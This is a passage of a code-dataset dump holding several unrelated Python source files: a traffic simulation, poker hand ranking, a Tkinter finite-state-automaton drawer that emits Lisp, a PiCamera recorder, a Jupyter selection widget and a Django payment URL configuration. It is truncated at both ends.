swap LOW and HIGH if necessary\n args = parser.parse_args()\n low, high = args.number_range\n if low > high:\n args.number_range.reverse()\n return args\n\n\ndef main():\n args = parse_args()\n\n # import all the draws from csv\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n logging.debug('Reading input files...')\n reader = Reader(args.inputfiles, args.use_headings,\n args.abort_on_error, args.number_range)\n draws = reader.read_files()\n logging.debug('done.')\n\n # generate an image for every combination of days\n for days in DAY_COMBINATIONS:\n days_results = filter_results(draws, days, args.weeks)\n if len(days_results) == 0:\n continue\n chart = DrawChart(days_results, args.number_range)\n writer = Writer(chart, args.resolution)\n filename = generate_filename(days, last_date(days_results))\n writer.write(filename)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":22626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"73888125","text":"from assets import *\n\npygame.init()\n\nFPS = 30\nfpsClock = pygame.time.Clock()\n\nstart = [400, 400]\nend = [2000, 400]\n\nroad = Road(0, start, end, 10, 3)\nroad2 = Road(1, end, [2100, 400], 1, 3)\nroad3 = Road(2, [2100, 400], [10000, 400], 10, 3)\nmodel.road_list = [road, road2, road3]\n\ncar = Vehicle(0, [400, 405], 0, [50, 25], RED, 0.2, 0.3, 1, 200, 100, 0, 5, 0, 0, 0.5, 30, None)\ncar2 = Vehicle(1, [500, 405], 0, [50, 25], BLUE, 0.1, 0.3, 1, 200, 100, 10, 5, 0, 0, 0.5, 30, None)\n#car3 = Vehicle(2, [1000, 405], 0, [50, 25], GREEN, 0, 0.3, 1, 200, 100, 5, 5, 0, 0, 0.5, 30, None)\nmodel.veh_list = [car, car2]\n\nmodel.populate_veh_lists()\n\nDISPLAYSURF = pygame.display.set_mode((800, 800), 0, 32)\npygame.display.set_caption('Road Traffic Simulation')\n\nwhile True:\n DISPLAYSURF.fill(WHITE)\n\n for road in model.road_list:\n road.draw(DISPLAYSURF)\n\n for vehicle in model.veh_list:\n vehicle.update()\n vehicle.draw(DISPLAYSURF)\n\n model.handle_events()\n\n #bend = Bend([500, 500], pygame.mouse.get_pos(), math.pi)\n #DISPLAYSURF.blit(bend.image, bend.blit_pos)\n\n pygame.display.update()\n fpsClock.tick(FPS)","sub_path":"old/run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"484474036","text":"from random import shuffle, randrange\nfrom itertools import combinations \n\nsuits = ['S', 'H', 'C', 'D']\ncards = [str(i) for i in range(2, 10)]\ncards.extend(['T', 'J', 'Q', 'K', 'A'])\n\n\ndef get_deck(shuffle_deck=True):\n deck = []\n for suit in suits:\n for card in cards:\n deck.append([card, suit])\n if shuffle_deck:\n shuffle(deck)\n return deck\n\n\ndef draw_cards(deck, nbr_of_cards):\n if len(deck) < nbr_of_cards:\n raise Exception(\n \"Requested number of cards cannot exceed the size of the deck\")\n card_idx = set()\n while len(card_idx) < nbr_of_cards:\n card_idx.add(randrange(len(deck)))\n drawn_cards = []\n for idx in card_idx:\n drawn_cards.append(deck[idx])\n return drawn_cards\n\n\ndef draw_cards_from_deck(deck: list, nbr_of_cards: int):\n if len(deck) < nbr_of_cards:\n raise Exception(\n \"Requested number of cards cannot exceed the size of the deck\")\n card_idx = set()\n while len(card_idx) < nbr_of_cards:\n card_idx.add(randrange(len(deck)))\n drawn_cards = []\n for idx in card_idx:\n drawn_cards.append(deck[idx])\n for drawn_card in drawn_cards:\n deck.remove(drawn_card)\n\n return deck, drawn_cards\n\n\n# Test function that checks the ranking of hands\n\n\ndef compare_players(nbr_of_players, cards):\n deck = get_deck(True)\n #drawn_cards = draw_cards(deck, 5 * nbr_of_players)\n \n table = []\n winner = []\n for x in range(5):\n table.append(cards.pop(nbr_of_players*2))\n for i in range(nbr_of_players):\n current_cards = []\n results = []\n #current_cards = drawn_cards[i * 5: (i+1) * 5]\n current_cards.append(cards.pop(0))\n current_cards.append(cards.pop(0))\n for x in range(5):\n current_cards.append(table[x])\n comb = combinations(current_cards, 5)\n for y in list(comb):\n rank = check_hand_rank(y)\n results.append(rank)\n #results.append(check_hand_rank(drawn_cards[i * 5 : (i+1) * 5]))\n #for res in results:\n # print(res)\n \n winner.append(results[0])\n for j in range(1, len(results)-1):\n if results[j][\"rank\"] > winner[i][\"rank\"]:\n winner[i] = results[j]\n elif results[j][\"rank\"] == winner[i][\"rank\"]:\n if results[j][\"score\"] > winner[i][\"score\"]:\n winner[i] = results[j]\n #print(winner[i])\n win_final = winner[0]\n win_player = 0\n for i in range(1, nbr_of_players):\n if winner[i][\"rank\"] > win_final[\"rank\"]:\n win_final = winner[i]\n win_player = i\n return win_player#winner\n\n\ndef get_hand_rank(hand):\n return ['--23456789TJQKA'.index(n) for n, h in hand]\n\n\ndef get_card_rank(card):\n return '--23456789TJQKA'.index(card)\n\n\ndef royal_straight_flush(hand):\n def royal_straight(hand):\n n = [n for n, h in hand]\n for c in n:\n if c not in ['A', 'K', 'Q', 'J', 'T'] or len(set(n)) != 5:\n return False\n return True\n return royal_straight(hand) and flush(hand)[\"result\"]\n\n\ndef high_card(hand):\n card_rank = ['--23456789TJQKA'.index(n) for n, h in hand]\n card_rank.sort()\n card_rank.reverse()\n return max(card_rank)\n\n\ndef one_pair(hand):\n card_rank = get_hand_rank(hand)\n pair_rank = -1\n for i in range(len(card_rank)):\n if card_rank.count(card_rank[i]) == 2:\n pair_rank = card_rank[i]\n break\n return {\"result\": len(set(card_rank)) == 4, \"rank\": pair_rank}\n\n\ndef two_pair(hand):\n s = [n for n, h in hand]\n \n if not (not three_of_a_kind(hand)[\"result\"] != True and len(set(s)) == 3):\n #if (three_of_a_kind(hand) == True and len(set(s)) == 3):\n return {\"result\": False, \"rank\": -1}\n card_rank = get_hand_rank(hand)\n card_rank.sort(reverse=True)\n \n rank = 0\n pair_set = set()\n for c in card_rank:\n if card_rank.count(c) == 2 and c not in pair_set:\n rank += c\n pair_set.add(c)\n return {\"result\": True, \"rank\": rank}\n\n\ndef three_of_a_kind(hand):\n s = [n for n, h in hand]\n s.sort()\n rank = -1\n status = False\n for i in range(len(s)):\n if s.count(s[i]) >= 3:\n status = True\n rank = get_card_rank(s[i])\n break\n return {\"result\": status, \"rank\": rank}\n\n\ndef full_house(hand):\n hand_rank = get_hand_rank(hand)\n #print(hand_rank)\n hand_rank_set = set(hand_rank)\n rank = 0\n threeofakind_result = three_of_a_kind(hand)\n if threeofakind_result[\"result\"] and len(hand_rank_set) == 2:\n for c in hand_rank_set:\n rank += c\n return {\"result\": True, \"rank\": rank}\n return {\"result\": False, \"rank\": -1}\n\n\ndef flush(hand):\n hand_rank = get_hand_rank(hand)\n s = [h for n, h in hand]\n if len(set(s)) != 1:\n return {\"result\": False, \"rank\": -1}\n return {\"result\": True, \"rank\": max(hand_rank)}\n\n\ndef straight(hand):\n tocheck_straight = ['--23456789TJQKA'.index(n) for n, h in hand]\n tocheck_straight.sort()\n tocheck_straight.reverse()\n if tocheck_straight == [14, 5, 4, 3, 2]:\n tocheck_straight = [5, 4, 3, 2, 1]\n if (max(tocheck_straight) - min(tocheck_straight) == 4) and (len(set(tocheck_straight)) == 5):\n return {\"result\": True, \"rank\": max(tocheck_straight)}\n else:\n return {\"result\": False, \"rank\": -1}\n\n\ndef four_of_a_kind(hand):\n hand_rank = get_hand_rank(hand)\n for i in range(len(hand_rank)):\n if hand_rank.count(hand_rank[i]) == 4:\n return {\"result\": True, \"rank\": hand_rank[i]}\n return {\"result\": False, \"rank\": -1}\n\n\ndef straight_flush(hand):\n straight_result = straight(hand)\n flush_result = flush(hand)\n if straight_result['result'] and flush_result['result']:\n return {\"result\": True, \"rank\": straight_result[\"rank\"]}\n else:\n return {\"result\": False, \"rank\": -1}\n\n\ndef check_hand_rank(hand):\n if royal_straight_flush(hand):\n return {\"rank\": 9, \"score\": -1, \"description\": \"Royal Straight Flush\"}\n is_straight_flush = straight_flush(hand)\n if is_straight_flush[\"result\"]:\n return {\"rank\": 8, \"score\": is_straight_flush[\"rank\"], \"description\": \"Straight Flush\"}\n is_four_of_a_kind = four_of_a_kind(hand)\n if is_four_of_a_kind[\"result\"]:\n return {\"rank\": 7, \"score\": is_four_of_a_kind[\"rank\"], \"description\": \"Four of a Kind\"}\n is_full_house = full_house(hand)\n if is_full_house[\"result\"]:\n return {\"rank\": 6, \"score\": is_full_house[\"rank\"], \"description\": \"Full House\"}\n is_flush = flush(hand)\n if is_flush[\"result\"]:\n return {\"rank\": 5, \"score\": is_flush[\"rank\"], \"description\": \"Flush\"}\n is_straight = straight(hand)\n if is_straight[\"result\"]:\n return {\"rank\": 4, \"score\": is_straight[\"rank\"], \"description\": \"Straight\"}\n is_three_ofa_kind = three_of_a_kind(hand)\n if is_three_ofa_kind[\"result\"]:\n return {\"rank\": 3, \"score\": is_three_ofa_kind[\"rank\"], \"description\": \"Three of a Kind\"}\n is_two_pair = two_pair(hand)\n if is_two_pair[\"result\"]:\n return {\"rank\": 2, \"score\": is_two_pair[\"rank\"], \"description\": \"Two Pair\"}\n is_one_pair = one_pair(hand)\n if is_one_pair[\"result\"]:\n return {\"rank\": 1, \"score\": is_one_pair[\"rank\"], \"description\": \"One Pair\"}\n return {\"rank\": 0, \"score\": high_card(hand), \"description\": \"High Card\"}\n","sub_path":"game_utils.py","file_name":"game_utils.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548769600","text":"from tkinter import Tk, Canvas, Frame, BOTH, LAST, W\r\nfrom collections import deque\r\nfrom random import randint\r\nimport re\r\nimport math\r\nimport sys\r\n\r\n#Name: Cesar Santiago\r\n#Course: COP4020\r\n#Project 4\r\n#Date: 03/22/2020\r\n#Description: A program that gives a graphical interpretation of an FSA as described\r\n#\tIn a file input by the user. It will also run an input string through the FSA\r\n#\tand output if that string is a legal part of the language or not.\r\nclass Scene(Frame):\r\n\t#Constructor of the frame and scene to which a GUI will be drawn.\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\t\r\n\t#The bulk of the program. It initializes a GUI and draws the FSA onto the Frame.\r\n\t#\tAs well as running the string through the FSA to detect if it is in the language.\r\n\tdef initUI(self):\r\n\t\trad = 25 # Constant for the radius of the automata\r\n\t\tscale = 1 # Constant for the scale of the size of the automata\r\n\t\tself.master.title(\"Final State Automata\")\r\n\t\tself.pack(fill=BOTH, expand=1)\r\n\t\t\r\n\t\t#Reading in the files as described in the arguments passed in by the console\r\n\t\tif(len(sys.argv) == 1):\r\n\t\t\tf = open(\"fsa.txt\", \"r\")\r\n\t\t\ttestF = open(\"legal.txt\", \"r\")\r\n\t\telse:\r\n\t\t\tf = open(sys.argv[1], \"r\")\r\n\t\t\ttestF = open(sys.argv[2], \"r\")\r\n\t\t\t\r\n\t\ttestString = testF.read()\r\n\t\ttokens = f.read()\r\n\t\ttestF.close()\r\n\t\tf.close()\r\n\t\ttokenList = re.split(';', tokens) #Split all of the tokens by the delimiter ;\r\n\t\tcanvas = Canvas(self)\r\n\t\t#Creating empty arrays for the Relations and the Automata\r\n\t\tlanguage = []\r\n\t\tautomata = []\r\n\t\tstates = []\r\n\t\tfor tok in tokenList:\r\n\t\t\tprint(tok.strip(' '))\r\n\t\t\r\n\t\tlanguage.append(tokenList[0])\r\n\t\tnumOfA = int(language[0])\r\n\t\t\r\n\t\tcanvas.create_text(350, 10, anchor = W, font = \"Comic\", text = tokenList[1])\r\n\t\t\r\n\t\t#Creates the automata.\r\n\t\tfor num in range(numOfA):\r\n\t\t\tx = 50 * scale\r\n\t\t\ty = 50 * scale\r\n\t\t\tscale += 1\r\n\t\t\tautomata.append(Automata(radius = rad, position = Vector(x, y), canvasInput = canvas, token = str(num)))\r\n\t\t\t\r\n\t\t#Takes the end states input.\r\n\t\tendStates = re.split(',', tokenList[4])\r\n\t\t#Sets the needed automata end states as true\r\n\t\tfor token in endStates:\r\n\t\t\tautomata[int(token)].end = True\r\n\r\n\t\t#Draws the automata.\r\n\t\tfor circles in automata:\r\n\t\t\tcircles.draw()\r\n\t\t\t\r\n\t\tstates = re.split(',', tokenList[2])\r\n\t\trelations = []\r\n\t\tstateCount = 0\r\n\t\tcanvas.create_line(automata[int(tokenList[3])].x - rad * 2, automata[int(tokenList[3])].y + rad * 2,\r\n\t\tautomata[int(tokenList[3])].x - rad * math.cos(math.pi/4), automata[int(tokenList[3])].y + rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\tfor s in states:\r\n\t\t\tlanguage = s.strip('(|)')\r\n\t\t\taStates = re.split(':', language)\r\n\t\t\ttok = aStates[2]\r\n\t\t\tr = Relation(initialVector = automata[int(aStates[0])], finalVector = automata[int(aStates[1])],\r\n\t\t\tcanvasInput = canvas, initialState = int(aStates[0]), finalState = int(aStates[1]), radius = automata[int(aStates[0])].rad, token = tok)\r\n\t\t\tr.draw()\r\n\t\t\trelations.append(r)\r\n\t\t\tstateCount += 1\r\n\t\t\r\n\t\ttheString = \"(defun demo()\\n\\t(setq fp (open \\\"\" + sys.argv[2] + \"\\\" :direction :input)) \\n\"\r\n\t\ttheString += \"\\t(setq l (read fp \\\"done\\\")) \\n\\t(princ \\\"processing \\\") \\n\\t(princ l) \\n\\t(fsa l)\\n)\\n(defun fsa(l)\\n\"\r\n\t\ttheString += \"\\t(cond ((null l) \\\"illegal empty string\\\")\\n\\t\\t(t (State0 l))\\n\\t)\\n)\\n\"\r\n\t\r\n\t\tfor c in automata:\r\n\t\t\ttheString += \"(defun State\" + c.tok + \"(l)\\n\\t(cond\\n\"\r\n\t\t\tif(c.end):\r\n\t\t\t\ttheString += \"\\t\\t((null l) \\\"legal state\\\")\\n\"\r\n\t\t\telse:\r\n\t\t\t\ttheString += \"\\t\\t((null l) \\\"illegal state\\\")\\n\"\r\n\t\t\tfor r in relations:\r\n\t\t\t\tprint(\"State: \" + c.tok + \" Transition: \" + str(r.i))\r\n\t\t\t\tif(c.tok == str(r.i)):\r\n\t\t\t\t\ttheString += \"\\t\\t((equal (car l) '\" + r.tok + \") (State\" + str(r.f) + \"(cdr l)))\\n\"\r\n\t\t\ttheString += \"\\t\\t(t \\\"Illegal character in the state\\\")\\n\\t)\\n)\\n\"\r\n\t\t\r\n\t\tprint(theString)\r\n\t\tlispFile = open(\"part2.lsp\", \"w+\")\r\n\t\tlispFile.write(theString)\r\n\t\tlispFile.close()\r\n\t\t\r\n\t\t#Reading the viability of an input string on the FSA\r\n\t\tcurrentA = int(tokenList[3])\r\n\t\tprint(testString)\r\n\t\tended = False\r\n\t\terror = False\r\n\t\tfor letter in testString:\r\n\t\t\tfound = False\r\n\t\t\tfor r in relations:\r\n\t\t\t\tif(letter == r.tok and currentA == r.i):\r\n\t\t\t\t\tcurrentA = r.f\r\n\t\t\t\t\tprint(\"Token: \" + letter + \" goes from: \" + str(r.i) + \" to \" + str(r.f))\r\n\t\t\t\t\tfound = True\r\n\t\t\tif(not found): \r\n\t\t\t\tprint(\"Illegal string.\") #If the string is illegal then output this\r\n\t\t\t\terror = True\r\n\t\t\t\tbreak\r\n\t\tfor tok in endStates:\r\n\t\t\tif(currentA == int(tok) and (not error)):\r\n\t\t\t\tended = True\r\n\t\t\t\tprint(\"Legal string.\") #If the string is legal then output this\r\n\t\t\r\n\t\tcanvas.pack(fill=BOTH, expand=1)\r\n\t\t\r\n'''\r\n(defun stateX(l)\r\n (cond ((null l) \"illegal: state 0 is an accept state\")\r\n\t\t((equal (car l) 'X) (stateX(cdr l)))\r\n\t\t((equal (car l) 'X) (stateY(cdr l)))\r\n\t\t(princ \"accept\\n\")\r\n\t\t(t \"illegal character in State 0\")\r\n )\r\n)\r\n'''\r\n\r\ndef main():\r\n\troot = Tk()\r\n\tex = Scene()\r\n\troot.geometry(\"400x400\")\r\n\troot.mainloop()\r\n\r\n#Vector: A vector class that simulates the math needed for this vector\r\nclass Vector:\r\n\tdef __init__(self, _x, _y, _t_x = 0, _t_y = 0):\r\n\t\tself.x = _x\r\n\t\tself.y = _y\r\n\t\tself.t_x = _t_x\r\n\t\tself.t_y = _t_y\r\n\t\t\r\n\tdef getMagnitude(self):\r\n\t\tmag = math.sqrt(math.pow(self.x - self.t_x, 2) + math.pow(self.y - self.t_y, 2))\r\n\t\treturn mag\r\n\t\t\r\n\tdef asUnitVector(self):\r\n\t\tx = self.x / self.getMagnitude()\r\n\t\ty = self.y / self.getMagnitude()\r\n\t\treturn Vector(x, y)\r\n\t\r\n\tdef subtract(self, vector):\r\n\t\tnewVector = Vector(self.x - vector.y, self.y - vector.y)\r\n\t\treturn newVector\r\n\r\n#Automata: A state in which the \r\nclass Automata:\r\n\tdef __init__(self, radius, position, canvasInput, token = \"1\", isEnd = False):\r\n\t\tself.rad = radius\r\n\t\tself.pos = position\r\n\t\tself.x = position.x\r\n\t\tself.y = position.y\r\n\t\tself.tok = token\r\n\t\tself.end = isEnd\r\n\t\tself.canvas = canvasInput\r\n\t\t\r\n\tdef draw(self):\r\n\t\tif(self.end):\r\n\t\t\tself.rad += 4\r\n\t\t\tself.canvas.create_oval(self.x - self.rad, self.y - self.rad, self.x + self.rad, self.y + self.rad, fill=\"White\")\r\n\t\t\tself.rad -= 4\r\n\t\tself.canvas.create_oval(self.x - self.rad, self.y - self.rad, self.x + self.rad, self.y + self.rad, fill=\"White\")\r\n\t\tself.canvas.create_text(self.x - 5, self.y, anchor = W, font = \"Comic\", text = self.tok)\r\n\r\n#Relation: A relation between one Automata class to another.\r\nclass Relation:\r\n\tdef __init__(self, initialVector, finalVector, initialState, finalState, canvasInput, radius, token):\r\n\t\tself.rad = radius\r\n\t\tself.i = initialState\r\n\t\tself.f = finalState\r\n\t\tself.vector = Vector(initialVector.x, initialVector.y, finalVector.x, finalVector.y)\r\n\t\tself.canvas = canvasInput\r\n\t\tself.tok = token\r\n\t\r\n\tdef draw(self):\r\n\t\tif(self.i == self.f):\r\n\t\t\t#Create a line going from the side of the Automata to the top with an arc of diameter\r\n\t\t\tself.canvas.create_line(self.vector.x + self.rad, self.vector.y,\r\n\t\t\tself.vector.x + self.rad * 2, self.vector.y - self.rad * 2,\r\n\t\t\tself.vector.t_x, self.vector.t_y - self.rad, \r\n\t\t\tarrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state change on a point of the previous line\r\n\t\t\tself.canvas.create_text(self.vector.x + self.rad + 10, self.vector.y - self.rad - 10, anchor = W, font = \"Comic\", text = self.tok)\r\n\t\t\t\r\n\t\telif(self.vector.getMagnitude() > 75):\r\n\t\t\t#Create a line from the left of an Automata to the other with an arc the lentgth of the radius times three\r\n\t\t\tself.canvas.create_line(self.vector.x - self.rad * math.cos(math.pi/4), self.vector.y + self.rad * math.sin(math.pi/4),\r\n\t\t\t(self.vector.x + self.vector.t_x) / 2 - self.rad * 3, (self.vector.y + self.vector.t_y) / 2 + self.rad * 3,\r\n\t\t\tself.vector.t_x - self.rad * math.cos(math.pi/4), self.vector.t_y + self.rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state change on the focus point of that line\r\n\t\t\tself.canvas.create_text((self.vector.x + self.vector.t_x) / 2 - self.rad * 3, (self.vector.y + self.vector.t_y) / 2 + self.rad * 3,\r\n\t\t\tanchor = W, font = \"Comic\", text = self.tok)\r\n\t\t\t\r\n\t\telse:\r\n\t\t\t#Create a straight diagonal line from one Automata to the other\r\n\t\t\tself.canvas.create_line(self.vector.x + self.rad * math.cos(math.pi/4), self.vector.y + self.rad * math.sin(math.pi/4),\r\n\t\t\tself.vector.t_x - self.rad * math.cos(math.pi/4), self.vector.t_y - self.rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state adgacent to the line\r\n\t\t\tself.canvas.create_text(self.vector.x + self.rad - 15, self.vector.x + self.rad + 5, anchor = W, font = \"Comic\", text = self.tok)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\t\r\n\t","sub_path":"COP4020/projects/santiagoc/fsa.py","file_name":"fsa.py","file_ext":"py","file_size_in_byte":8512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286637215","text":"#! /usr/bin/python3\n# Yasushiu Honda 2021 9/8\n# Capture frames from PiCamera and record them to /tmp \n\nimport cv2\nimport time\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport modules.keyin as keyin\n\nclass PI_CAMERA():\n def __init__(self,width,height):\n \n # カメラの解像度 例:640x480, 320x240\n self.RES_X=int( width )\n self.RES_Y=int( height )\n \n # initialize the camera and grab a reference to the raw camera capture\n #カメラを初期化,カメラへのアクセス?ルート?オブジェクト作成?\n self.cam = PiCamera()\n self.cam.framerate = 30 #フレームレート\n self.cam.brightness = 60 #明るさ\n #cam.saturation = 50\n\n self.cam.awb_mode='auto'\n #list_awb = ['off', 'auto', 'sunlight', 'cloudy', 'shade']\n self.cam.iso=200\n self.cam.shutter_speed=1000000\n self.cam.exposure_mode = 'auto' # off, auto, fixedfps\n time.sleep(1)\n self.g = self.cam.awb_gains\n self.cam.awb_mode = 'off'\n self.cam.awb_gains = self.g\n\n self.cam.resolution = (self.RES_X, self.RES_Y)\n self.cam.rotation=0\n self.cam.meter_mode = 'average' # average, spot, backlit, matrix\n self.cam.exposure_compensation = 0\n self.rawCapture = PiRGBArray(self.cam, size=(self.RES_X, self.RES_Y))\n\n self.rawCapture.truncate(0) # clear the stream for next frame\n\n def capture(self):\n tmp = self.cam.capture_continuous(self.rawCapture, format=\"bgr\", use_video_port=\"True\")\n cap = next(tmp)\n frame = cap.array\n\n self.rawCapture.truncate(0) # clear the stream for next frame\n\n return frame\n\n\nif __name__ == \"__main__\":\n # For recording\n record='n' # if you want record movie, select 'y' \n # and its FPS down to 10Hz.\n # if you select 'n' FPS is 30Hz without recording.\n OUT_FILE=\"/tmp/output.mp4\"\n\n PERIOD=0.2 # Indication period\n\n\n print(\"# Captured movie is written in %s .\" % OUT_FILE)\n fmt = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n record_fps=10\n width=320\n height=320\n print(\"# Resolution: %5d x %5d\" % (width,height))\n size = (width, height)\n vw = cv2.VideoWriter(OUT_FILE, fmt, record_fps, size)\n\n cam = PI_CAMERA(width,height)\n\n key=keyin.Keyboard()\n ch='c'\n\n now=time.time()\n start=now\n init=now\n count=0\n print(\"# To stop, input 'q' in this terminal.\")\n while ch!='q':\n now=time.time()\n count+=1 \n if now-init>PERIOD:\n print(\"\\r time: %8.2f; rate:%6.2f\" % (now-start,count/PERIOD), end='')\n count=0\n init=now \n\n ch=key.read()\n try: \n frame = cam.capture()\n cv2.imshow(\"Front View\", frame)\n cv2.waitKey(1)\n\n if record=='y':\n vw.write(frame)\n\n except KeyboardInterrupt:\n print(\"ctrl + C \")\n cv2.destroyAllWindows()\n vw.release()\n\n cv2.destroyAllWindows()\n vw.release()\n print(\"\\n # Bye-bye \\n\")\n","sub_path":"picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"634902271","text":"# Remove every second element of an array \n\n# Easiest Option \ndef rem_second(arr):\n return arr[::2]\n\n\ndef remove_second(arr):\n new_arr= []\n for i, j in enumerate(arr):\n if i % 2 == 0:\n new_arr.append(j)\n return (new_arr)\n \nprint(remove_second([\"hi\", \"bye\",\"hello\",\"goodbye\"])) # \"hi\" \"hello\"\nprint(remove_second([1,2,3,4,5,6])) # 1,3,5","sub_path":"Extra_Practice/remove_second_element.py","file_name":"remove_second_element.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224674620","text":"from typing import List\n\nimport ipywidgets.widgets as widgets\nfrom IPython.core.display import display, Javascript\n\nfrom labext.modules import JQuery, Selectize, MiscFunc\nfrom labext.widget import WidgetWrapper\n\n\nclass Selection(WidgetWrapper):\n\n def __init__(self, *args, **kwargs):\n self._widget = widgets.Select(*args, **kwargs)\n self.unique_class_id = f\"IJ_selection_{self._widget.model_id}\"\n self._widget.add_class(self.unique_class_id)\n\n @property\n def widget(self):\n return self._widget\n\n @staticmethod\n def required_modules():\n return [JQuery, Selectize, MiscFunc]\n\n def sync(self, fix_overflow: bool = True):\n jscode = f\"\"\"\nrequire([\"{JQuery.id()}\", \"{Selectize.id()}\"], function ($, _) {{\n {MiscFunc.call_until_return_true}(function () {{\n // get the selection container\n var $el = $(\".{self.unique_class_id}\");\n if ($('select', $el).length == 0) {{\n return false;\n }}\n\n // make it looks beautiful\n $('select', $el).selectize();\n $('.selectize-control', $el).width('100%');\n \n if ({\"true\" if fix_overflow else \"false\"}) {{\n var $p = $el.parent();\n for (var i = 0; i < 64; i++) {{\n $p.css('overflow', 'inherit');\n if ($p.hasClass('jp-OutputArea') && $p.hasClass('jp-Cell-outputArea')) {{\n break;\n }}\n $p = $p.parent();\n }}\n }}\n\n return true;\n }}, 100);\n}}\n\"\"\"\n display(Javascript(jscode))\n\n\nclass RecordedSelection:\n \"\"\"\n Key is the key that we want to select the value\n Value is the value that we are going to select\n \"\"\"\n\n def __init__(self, recorded_data: dict, key: str, options: List[str], label):\n self.recorded_data = recorded_data\n self.options = options\n self.key = key\n self.widget = Selection(\n options=[(x, i) for i, x in enumerate(options)],\n value=self.recorded_data.get(self.key, 0),\n description=label,\n disabled=False,\n )\n self.widget.widget.observe(self.update, names='value')\n\n def update(self, change):\n self.recorded_data[self.key] = change['new']\n\n def set_key(self, key):\n self.key = key\n return self\n\n def sync_value(self):\n self.widget.value = self.recorded_data.get(self.key, 0)\n return self\n","sub_path":"labext/widgets/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586817454","text":"\"\"\"pters URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.PaymentView.as_view(), name='index'),\n # 이용권 구매 내역 페이지\n url(r'^payment_history/$', views.PaymentHistoryView.as_view(), name='payment_history'),\n\n # 결제 관련 ##########################################################################################################\n # 결제 검사\n url(r'^check_before_billing/$', views.check_before_billing_logic, name='check_before_billing'),\n\n # 결제시 완료 검사 페이지\n url(r'^check_finish_billing/$', views.check_finish_billing_logic, name='check_finish_billing'),\n # iamport 에서 결과 전송할때 동작하는 페이지\n url(r'^billing_check/$', views.billing_check_logic, name='billing_check'),\n\n\n # 정기 결제 변경 ######################################################################################################\n # 정기 결제 취소(해지) 페이지\n url(r'^cancel_period_billing/$', views.cancel_period_billing_logic, name='cancel_period_billing'),\n\n # 정기 결제 재시작 페이지\n url(r'^restart_period_billing/$', views.restart_period_billing_logic, name='restart_period_billing'),\n # 정기 결제 일시 정지 해제 페이지\n url(r'^clear_pause_period_billing/$', views.clear_pause_period_billing_logic,\n name='clear_pause_period_billing'),\n # 정기 결제 카드 삭제 페이지\n url(r'^delete_period_billing/$', views.delete_period_billing_logic,\n name='delete_period_billing'),\n\n # 정기 결제 결제 방법 변경 체크 페이지\n url(r'^check_update_period_billing/$', views.check_update_period_billing_logic, name='check_update_period_billing'),\n # 정기 결제 결제 방법 변경 페이지\n url(r'^update_period_billing/$', views.update_period_billing_logic, name='update_period_billing'),\n\n\n # 개발 중 ################################################################################\n # 정기 결제 이용권 변경\n url(r'^update_payment_product_info/$', views.update_payment_product_info_logic, name='update_payment_product_info'),\n # 정기 결제 이용권 변경 예약\n url(r'^update_reserve_product_info/$', views.update_reserve_product_info_logic, name='update_reserve_product_info'),\n ########################################################################################################\n\n\n # 결제 정보 조회 ######################################################################################################\n # 결제 예정인 결제 정보 불러오기\n url(r'^get_payment_schedule_info/$', views.GetPaymentScheduleInfoView.as_view(), name='get_payment_schedule_info'),\n\n # 현재 이용중인 결제 정보 불러오기 (정기 결제인지 아닌지도 전달)\n url(r'^get_payment_info/$', views.GetPaymentInfoView.as_view(), name='get_payment_info'),\n\n # 현재 진행중인 정기 결제 정보 불러오기\n url(r'^get_billing_info/$', views.GetBillingInfoView.as_view(), name='get_billing_info'),\n\n # 결제 정보 리스트 조회\n url(r'^get_payment_list/$', views.GetPaymentListView.as_view(), name='get_payment_list'),\n\n # 상품 정보 가져오기\n url(r'^get_product_info/$', views.GetProductInfoView.as_view(), name='get_product_info'),\n\n\n # 쿠폰 기능\n url(r'^get_coupon_product_info/$', views.GetCouponProductInfoView.as_view(), name='get_coupon_product_info'),\n url(r'^payment_for_coupon/$', views.payment_for_coupon_logic, name='payment_for_coupon'),\n\n\n # 현재 미사용 ########################################################################################################\n url(r'^delete_billing_info/$', views.delete_billing_info_logic, name='delete_billing_info'),\n # 결제 페이지\n url(r'^resend_period_billing/$', views.resend_period_billing_logic, name='resend_period_billing'),\n # 결제 완료 페이지\n url(r'^payment_complete/$', views.PaymentCompleteView.as_view(), name='payment_complete'),\n\n 